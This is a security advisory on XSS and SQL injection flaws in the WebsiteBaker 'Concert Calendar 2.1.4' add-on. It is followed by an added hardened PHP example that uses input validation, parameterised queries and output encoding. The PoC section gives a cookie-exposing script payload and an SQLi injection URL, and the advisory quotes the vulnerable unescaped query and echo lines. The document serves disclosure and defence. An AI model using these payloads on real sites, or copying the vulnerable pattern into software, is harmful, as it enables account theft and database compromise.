Advisory: Websitebaker Add-on 'Concert Calendar 2.1.4' XSS & SQLi vulnerability
Advisory ID: SSCHADV2013-001
Author: Stefan Schurtz
Affected Software: Successfully tested on Concert Calendar 2.1.4
Vendor URL: http://addons.websitebaker2.org/pages/en/browse-add-ons.php?id=0E8BC37
Vendor Status: informed

==========================
Vulnerability Description
==========================

The WebsiteBaker add-on 'Concert Calendar 2.1.4' is prone to cross-site scripting (XSS) and SQL injection (SQLi) vulnerabilities. The 'date' request parameter is read from $_GET without any validation or filtering and is then used twice in view.php: concatenated into an SQL query string (SQLi) and echoed into the page without HTML encoding (XSS).

==========================
Vuln code
==========================

// view.php
if (isset($_GET['date'])) {
    $date = $_GET['date'];   // user-controlled value, no validation or filtering
}
.
.
.
// SQLi: $date is interpolated directly into the query string (line 184)
$query_dates = mysql_query("SELECT * FROM ".TABLE_PREFIX."mod_concert_dates WHERE section_id = '$section_id' && concert_date = '$date'");

// XSS: $date is written into the HTML output without encoding (line 176)
echo " ".switch_date($date, $dateview)." ";

==========================
PoC-Exploit
==========================

// SQLi (requires magic_quotes = off, since the injection point is inside single quotes)
http://[target]/wb/pages/addon.php?date=[SQLi]

// XSS (the leading '"> closes the surrounding markup before the script tag)
http://[target]/wb/pages/addon.php?date='"><script>alert(document.cookie)</script>

==========================
Solution
==========================

-

==========================
Disclosure Timeline
==========================

01-Jan-2013 - developer informed

==========================
Credits
==========================

Vulnerabilities found and advisory written by Stefan Schurtz.

==========================
References
==========================

http://addons.websitebaker2.org/pages/en/browse-add-ons.php?id=0E8BC37
http://www.darksecurity.de/advisories/2012/SSCHADV2012-022.txt
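The following is an added example, not part of the original advisory and not the Concert Calendar add-on's own code. It shows a hardened counterpart to the two vulnerable lines quoted under "Vuln code": the 'date' parameter is validated against a fixed format before use, the query is parameterised through PDO instead of string interpolation, and the value is HTML-encoded on output. The table and column names are taken from the advisory's excerpt; the YYYY-MM-DD date format, the 'wb_' table prefix, the PDO connection and the pass-through fallback for the add-on's switch_date() are assumptions made for this example.

```php
<?php
// Added example, not the add-on's code. Hardened replacement for the
// vulnerable 'date' handling in view.php (SQLi at line 184, XSS at line 176).
declare(strict_types=1);

/**
 * Return $_GET['date'] only if it is a real calendar date in YYYY-MM-DD
 * form (assumed format), otherwise null. Whitelisting the shape of the
 * input means a quote or angle bracket never reaches the query or the page.
 */
function readDateParam(array $get): ?string
{
    if (!isset($get['date']) || !is_string($get['date'])) {
        return null;
    }
    $date = $get['date'];
    if (!preg_match('/^\d{4}-\d{2}-\d{2}$/', $date)) {
        return null;
    }
    // Reject well-formed but impossible dates such as 2013-02-30.
    [$y, $m, $d] = array_map('intval', explode('-', $date));
    return checkdate($m, $d, $y) ? $date : null;
}

/**
 * Parameterised version of the line-184 query. The values travel as bound
 * parameters, so the single-quote context the PoC relies on no longer exists.
 * TABLE_PREFIX is a constant, not user input, so concatenating it is fine.
 */
function fetchConcertDates(PDO $db, int $sectionId, string $date): array
{
    $sql = 'SELECT * FROM ' . TABLE_PREFIX . 'mod_concert_dates'
         . ' WHERE section_id = :section_id AND concert_date = :concert_date';
    $stmt = $db->prepare($sql);
    $stmt->execute([
        ':section_id'   => $sectionId,
        ':concert_date' => $date,
    ]);
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

/**
 * Encode a string for an HTML text node or quoted attribute. ENT_QUOTES
 * covers both ' and ", which the payload '"><script>... needs to break out
 * of the surrounding markup; ENT_SUBSTITUTE stops invalid UTF-8 from
 * silently emptying the output.
 */
function h(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// ---- Usage as it would appear in view.php --------------------------------
if (!defined('TABLE_PREFIX')) {
    define('TABLE_PREFIX', 'wb_'); // assumed prefix for the example
}
if (!function_exists('switch_date')) {
    // The add-on's own formatter is not part of this example: pass through.
    function switch_date(string $date, $view = null): string { return $date; }
}

$date      = readDateParam($_GET) ?? date('Y-m-d'); // safe default: today
$sectionId = (int) ($section_id ?? 0);               // cast, never interpolated raw
$dateview  = $dateview ?? null;

// $db is assumed to be a PDO connection with PDO::ERRMODE_EXCEPTION set:
// $rows = fetchConcertDates($db, $sectionId, $date);

// Replacement for line 176: encoded on output, so even an unvalidated
// value could not inject markup here.
echo ' ' . h(switch_date($date, $dateview)) . ' ';

// Self-check against the advisory's XSS payload: it fails validation and,
// even if it reached the output, encoding leaves no '<' in the HTML.
$payload = '\'"><script>alert(document.cookie)</script>';
assert(readDateParam(['date' => $payload]) === null);
assert(strpos(h($payload), '<') === false);
```

Two points for anyone patching this add-on: relying on magic_quotes (as the SQLi PoC's "magic_quotes = off" condition implies) is not a fix, since the directive was deprecated in PHP 5.3 and removed in 5.4, and it only escapes quotes, which does nothing for a value interpolated into a numeric context such as section_id. Validation and parameterisation close the SQL injection regardless of PHP configuration, and output encoding closes the XSS independently of whether the query was ever fixed.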